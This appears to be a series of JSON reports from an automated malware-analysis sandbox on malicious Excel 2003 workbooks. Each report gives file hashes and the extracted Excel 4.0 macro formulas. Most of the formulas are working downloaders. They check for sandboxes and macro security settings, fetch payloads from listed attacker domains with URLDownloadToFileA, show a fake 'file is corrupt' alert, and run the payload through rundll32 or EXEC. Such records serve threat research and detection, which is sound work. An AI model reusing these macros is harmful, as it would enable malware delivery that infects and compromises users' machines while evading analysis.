{"version":"0.2","sample":{"sample":"","kind":"file","target":"6483d778cb75950ef040cc3fcf1fa30f142c0a446a1d5965664250e065c0e3c7"},"analysis":{"reported":"2020-04-09T16:16:39Z","score":10},"files":[{"filename":"6483d778cb75950ef040cc3fcf1fa30f142c0a446a1d5965664250e065c0e3c7","filesize":116224,"md5":"997accd20c1b642a221c642553c762af","sha1":"19b8e3bc5430afcf65487022b566dbe9f2d45e2b","sha256":"6483d778cb75950ef040cc3fcf1fa30f142c0a446a1d5965664250e065c0e3c7","sha512":"b0912a26b51e70b1c9e2c574a6e95ad4b84a57e1477c90824ce7d9880e0512147d3038dde6a4dd425499d520cc2876b5a1fc7defd91ea0651035be2c73917fbe","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6483d778cb75950ef040cc3fcf1fa30f142c0a446a1d5965664250e065c0e3c7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"bUbbDArPAC\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"648c1b73e8244913eef1056209347018dc05966f90825e95105f35c8676a6f06"},"analysis":{"reported":"2020-04-09T16:16:39Z","score":10},"files":[{"filename":"648c1b73e8244913eef1056209347018dc05966f90825e95105f35c8676a6f06","filesize":206336,"md5":"a0f28f7146b224d71014a5b6af6575fd","sha1":"f5fb46b9a42a6ef95cf9f18919a7e959c32ddbaf","sha256":"648c1b73e8244913eef1056209347018dc05966f90825e95105f35c8676a6f06","sha512":"1280ebd6a7e253a7b31a010ee0a3d1187a04a509ebda49ea276d0b3262e8da7abe2b1359fc169cb901a9c96c2004049feb742e4b1b68421f6fe9a863660f12fd","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"648c1b73e8244913eef1056209347018dc05966f90825e95105f35c8676a6f06.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"hf58bshJMV\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6498c878644aeedc323a9729afdc881b5f4f2be1f580731464c3cc822e5cbfaf"},"analysis":{"reported":"2020-04-09T16:16:39Z","score":10},"files":[{"filename":"6498c878644aeedc323a9729afdc881b5f4f2be1f580731464c3cc822e5cbfaf","filesize":170496,"md5":"e139236df5c4f2c5902830303bccf70b","sha1":"76b4c40c73a3482fdd533d82254b60d3721187d1","sha256":"6498c878644aeedc323a9729afdc881b5f4f2be1f580731464c3cc822e5cbfaf","sha512":"beba273d5c872c457376a986dba30ce791c7d5dfc020d0f5739f81213c3b0e0e795bd36e6bd8aab964f20ba020d9406302d3635ee88aa712f9bc8180f22f64a3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6498c878644aeedc323a9729afdc881b5f4f2be1f580731464c3cc822e5cbfaf.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"mXvDbOQ3c9\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"649cc7020ccdba33eab22ff3baa8e4cf4356a78836631b60aabd0eef98f292b6"},"analysis":{"reported":"2020-04-09T16:16:39Z","score":10},"files":[{"filename":"649cc7020ccdba33eab22ff3baa8e4cf4356a78836631b60aabd0eef98f292b6","filesize":171008,"md5":"370567b92bd0d39baa0b266421de11e4","sha1":"864530e22f8676ced7f0e74e20f92f9f2ff7e338","sha256":"649cc7020ccdba33eab22ff3baa8e4cf4356a78836631b60aabd0eef98f292b6","sha512":"96dc51785438f078a3cd1880df9074acfbeef0fdfcf5c8f1e2c2a74f855e0361de674a16931946eb3138fff003317728aea70a67d3906df0321455214a3280a0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"649cc7020ccdba33eab22ff3baa8e4cf4356a78836631b60aabd0eef98f292b6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ethelenecrace.xyz/fbb3"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ethelenecrace.xyz/fbb3\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"stuaGJINGm\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"649d01270390d3fedd3020bc78c63b757d7b5723d3cc68b6562b2dd15f2f889e"},"analysis":{"reported":"2020-04-09T16:16:39Z","score":10},"files":[{"filename":"649d01270390d3fedd3020bc78c63b757d7b5723d3cc68b6562b2dd15f2f889e","filesize":206336,"md5":"edb71ae3f400bcc87956a90e42ef7916","sha1":"323ef6a162d06004104b2b7f6762a9d2d9c720b6","sha256":"649d01270390d3fedd3020bc78c63b757d7b5723d3cc68b6562b2dd15f2f889e","sha512":"cc3b55d4ff60d016cee7e0d3f6d62a4f0cc04eef2ce757b43953649e9118e28dbd4611459d2a89a5ec49715e0d978d9f7e6ca6be1d86aeb4f5f62c41fe3d1f0e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"649d01270390d3fedd3020bc78c63b757d7b5723d3cc68b6562b2dd15f2f889e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"4Q5C0gqeVQ\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"64a23fea0bc18eac47a9f6e0196dfad437b5bdf18ebafa21da0a40d0bf864c23"},"analysis":{"reported":"2020-04-09T16:16:39Z","score":10,"tags":["macro"]},"signatures":[{"name":"Suspicious Office macro","score":8,"tags":["macro"],"yara_rule":"office_macro_on_action","desc":"Office document macro which triggers in special circumstances - often malicious."}],"files":[{"filename":"64a23fea0bc18eac47a9f6e0196dfad437b5bdf18ebafa21da0a40d0bf864c23","filesize":833536,"md5":"9fb2f5e7e1fe9562ae5587cc532d4e5b","sha1":"3de9c38ac9299b5e89beefd39780fa2302fa6a36","sha256":"64a23fea0bc18eac47a9f6e0196dfad437b5bdf18ebafa21da0a40d0bf864c23","sha512":"700001a0a5c4cef896362b2bcd5554c6a82194befdc302f0b4eb436cf4f5afdbb8a883aa7c439efeb3872096b461bde2e5a2f66b8d596246abd9242ee743d5f3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"64a23fea0bc18eac47a9f6e0196dfad437b5bdf18ebafa21da0a40d0bf864c23.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"HYPERLINK(\"http://a.hiphotos.baidu.com/album/pic/item/29381f30e924b89927f5c2f46e061d950b7bf635.jpg\",\"\")\nHYPERLINK(\"http://a.hiphotos.baidu.com/album/pic/item/29381f30e924b89927f5c2f46e061d950b7bf635.jpg\",\"\")\nLEFT(SUBSTITUTE(SUBSTITUTE(SUBSTITUTE(\"# Additionally, comments (such as these) may be inserted on individua\r\n# The IP address and the host name should be separated by at least one\r\n110.75.29.135 s8.taobao.com indivual line. Tdss individual lins\r\n1.93.96.182 s.taobao.com 3c.taobao.com spu.taobao.com list.taobao.com\",\"|\",\"\n\"),\"[{\",),\"}]\",),1)\nSUBSTITUTE(SUBSTITUTE(SUBSTITUTE(\"# Additionally, comments (such as these) may be inserted on individua\r\n# The IP address and the host name should be separated by at least one\r\n110.75.29.135 s8.taobao.com indivual line. Tdss individual lins\r\n1.93.96.182 s.taobao.com 3c.taobao.com spu.taobao.com list.taobao.com\",\"|\",\"\n\"),\"[{\",),\"}]\",)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"64d66711d4e18c2f6073d2aef923474387a239d85149fc660f59a8310b4045ad"},"analysis":{"reported":"2020-04-09T16:16:40Z","score":10},"files":[{"filename":"64d66711d4e18c2f6073d2aef923474387a239d85149fc660f59a8310b4045ad","filesize":185344,"md5":"27e670f5190a4a75b70deefea740d2b6","sha1":"f3c2854181603e673c3fbf37a1fef16aea097f29","sha256":"64d66711d4e18c2f6073d2aef923474387a239d85149fc660f59a8310b4045ad","sha512":"bf6f7b1a4c2d8592c3910ed011f32035f4a1b9c17c3e94f9d686afbd5c90f1f65c3910313369787cc421af774e762861fd993c1964a79c11211e144acec871a3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"64d66711d4e18c2f6073d2aef923474387a239d85149fc660f59a8310b4045ad.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"64e6d9cac733792b1f2e213efe87727c5c73d4b14b176868a3a28794cbd8ac0c"},"analysis":{"reported":"2020-04-09T16:16:40Z","score":10},"files":[{"filename":"64e6d9cac733792b1f2e213efe87727c5c73d4b14b176868a3a28794cbd8ac0c","filesize":185344,"md5":"8db371ed513e0e8249cee1b49e4a5ad8","sha1":"0e6b8f84a82d6f4b738ee49f150a3b32d2fabde7","sha256":"64e6d9cac733792b1f2e213efe87727c5c73d4b14b176868a3a28794cbd8ac0c","sha512":"19769ec048a0331afd354e840bab24aa10331baa50dd53aa6b89e91b3d5629ea54442d6ed9d76c6dd01bee906db1cc2018da12a544682798970e3852837fafda","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"64e6d9cac733792b1f2e213efe87727c5c73d4b14b176868a3a28794cbd8ac0c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"64eb3ba3f55f4d148e0125e485f2bfcae1696993fc5971135d472483356d3515"},"analysis":{"reported":"2020-04-09T16:16:40Z","score":10},"files":[{"filename":"64eb3ba3f55f4d148e0125e485f2bfcae1696993fc5971135d472483356d3515","filesize":168448,"md5":"612abe185b7bef9c8bcec07354abeb1c","sha1":"c2c4dd3703ae9ff4441dd675c21c78e1f9133d64","sha256":"64eb3ba3f55f4d148e0125e485f2bfcae1696993fc5971135d472483356d3515","sha512":"006bf1e9aaea0be2bee93c6b18ac0293b254cc464c30d17c4127579b37127d513f929ab9d11e991145c191a00334c49df7a6357f0264155771838de642121b69","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"64eb3ba3f55f4d148e0125e485f2bfcae1696993fc5971135d472483356d3515.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"MhhoAJTbj5\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"64ed1ff777e2b32b6cf354f8b86bde64dc50b253723a4316ecef5a70871014fe"},"analysis":{"reported":"2020-04-09T16:16:40Z","score":10},"files":[{"filename":"64ed1ff777e2b32b6cf354f8b86bde64dc50b253723a4316ecef5a70871014fe","filesize":221184,"md5":"8712b3d4802b020288fc42df846021ed","sha1":"89d8be656f3e7059079cc4a678b75a9cc911d927","sha256":"64ed1ff777e2b32b6cf354f8b86bde64dc50b253723a4316ecef5a70871014fe","sha512":"50859ade2dc16561c5226edb4be0a16f42fbd480f2cce50641fe124517e43c0a9b3daf536bbabc65d92609a8bd47f6cbdcc3ececc8144bf6dc5f917b8f7d884e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"64ed1ff777e2b32b6cf354f8b86bde64dc50b253723a4316ecef5a70871014fe.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://efbzfyvsb.website/f2f23"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-4]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-4]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://efbzfyvsb.website/f2f23\",\"c:\\Users\\Public\\b7gf5yk.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5yk.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"dzaZP0i8B5\",TRUE)\nGOTO(R$3C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"64f6aaab004357142b2da61722a243dcaa33996be993950825567fc3e2cd0b69"},"analysis":{"reported":"2020-04-09T16:16:40Z","score":10},"files":[{"filename":"64f6aaab004357142b2da61722a243dcaa33996be993950825567fc3e2cd0b69","filesize":167936,"md5":"28ee115ddcfb26e393963e3a5217d671","sha1":"32824bcaef133abe2c0553eefe59269927e4a83f","sha256":"64f6aaab004357142b2da61722a243dcaa33996be993950825567fc3e2cd0b69","sha512":"aa02c3784dc68345412bba3b4f051c406a4928ed4d9d73eaa011db28a872f0c23a617b13f227dc15473100e713542bd87bf641e903b73dba6d4e33d5236ed415","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"64f6aaab004357142b2da61722a243dcaa33996be993950825567fc3e2cd0b69.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Yp1NWIpGEZ\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6512b69dba8639cbfde496e317e507ef85509dc1db2f17479c218d1009833b8b"},"analysis":{"reported":"2020-04-09T16:16:41Z","score":10},"files":[{"filename":"6512b69dba8639cbfde496e317e507ef85509dc1db2f17479c218d1009833b8b","filesize":206336,"md5":"b656d9a310356dc77dc8b60b60333dcf","sha1":"50c66f1ae2e7e95be1097270f8785c68050294ca","sha256":"6512b69dba8639cbfde496e317e507ef85509dc1db2f17479c218d1009833b8b","sha512":"77ca3d5c69e6c145a45c6d0d9c220a9e7e2ba12e3a34b5bab3bf53b4df3ffa02cfd4bbd2ad654889b4149513e3288a23e4b1f3a3da6715edbe76122c993f3661","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6512b69dba8639cbfde496e317e507ef85509dc1db2f17479c218d1009833b8b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"3bHW8oFK4a\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"65283f4064e7c1271d54c51eaf6d4192d1f5b681e47dd0bcf71b76dc08e4ddec"},"analysis":{"reported":"2020-04-09T16:16:41Z","score":10},"files":[{"filename":"65283f4064e7c1271d54c51eaf6d4192d1f5b681e47dd0bcf71b76dc08e4ddec","filesize":116224,"md5":"cbea52559c7d789fe679d4110894138f","sha1":"98057a6e57a6f00d0c18c4df6197a2ce3b3a4c30","sha256":"65283f4064e7c1271d54c51eaf6d4192d1f5b681e47dd0bcf71b76dc08e4ddec","sha512":"1ab0899eb944c2a1f6b868d130ed05a916142a7c7762d5b8e5b719c8bd3228e33a2738f7f9f4d65a29b43fa10bd2316bec649db737d28de9bf5b14b3a53c51ac","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"65283f4064e7c1271d54c51eaf6d4192d1f5b681e47dd0bcf71b76dc08e4ddec.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"GRITwRBpbF\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"652c9eabb27a3827ca167972efcb5663eefdbaf8ae5ca70805e6c6113c24c7cc"},"analysis":{"reported":"2020-04-09T16:16:41Z","score":10},"files":[{"filename":"652c9eabb27a3827ca167972efcb5663eefdbaf8ae5ca70805e6c6113c24c7cc","filesize":182784,"md5":"850087142307ab45da69b7d695b3e78b","sha1":"9453275480ebcbf42d15c4495a5fdec9dd30e992","sha256":"652c9eabb27a3827ca167972efcb5663eefdbaf8ae5ca70805e6c6113c24c7cc","sha512":"64fe4c0c907b74e3c852f231bb1b3e2764e0cd3bb87a85d772a1cd4604df028704c9631d6bd93738f1745e2ac801a4ed889ef784491b9a45a34b1bd6dfee6ac6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"652c9eabb27a3827ca167972efcb5663eefdbaf8ae5ca70805e6c6113c24c7cc.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://g2creditsolutions.com/trusty/444444.png","http://lorrainehomeconsulting.com/wp-content/uploads/2020/02/trusty/187213.png"],"attr":{"formulas":"ERROR(FALSE)\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://g2creditsolutions.com/trusty/444444.png\",\"c:\\Users\\Public\\1.exe\",0,0)\nIF(R$1C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://lorrainehomeconsulting.com/wp-content/uploads/2020/02/trusty/187213.png\",\"c:\\Users\\Public\\1.exe\",0,0),)\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nEXEC(\"c:\\Users\\Public\\1.exe\")\nCLOSE(FALSE)\nWORKBOOK.HIDE(\"SDJKv3\",TRUE)"}}}]}
